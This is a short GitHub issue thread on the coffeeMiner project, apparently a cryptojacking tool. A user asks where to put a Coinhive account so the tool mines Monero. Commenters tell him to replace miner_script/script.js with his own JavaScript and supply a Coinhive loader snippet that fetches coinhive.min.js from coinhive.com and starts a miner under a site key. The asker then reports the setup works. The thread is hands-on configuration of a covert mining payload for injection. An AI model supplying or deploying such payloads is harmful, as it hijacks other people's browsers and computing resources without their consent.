### ISSUE TITLE
 How to place my coinhive account?

### ISSUE THREAD

**Issue by JesusPorras7** [arnaucode/coffeeMiner#4]
How do I add the coinhive account to generate monero?

**Comment by LinuxSTAIN** [comment]
cd into miner_script and change the contents of script.js to include only your javascript

**Comment by JesusPorras7** [comment]
I know we have to change it in script.js, but I do not understand where I get the javascript from the coinhive page.

**Comment by zikle** [comment]
```
<script src="https://coinhive.com/lib/coinhive.min.js"></script>   
<script>    
	var miner = new CoinHive.User('SITE_KEY', 'john-doe');    
	miner.start();       
</script>
```

**Comment by JesusPorras7** [comment]
thanks friend I only have a couple of questions I guess where you put "CoinHive.User" in user has to go my user, in site_key the site that I believe in coinhive and in john-doe that I'm supposed to place? and finally the script I put it inside the script.js file alert or below in a new line.
Thank you.

**Comment by JesusPorras7** [comment]
Ok, I think I have everything solved Thanks, I close the post.
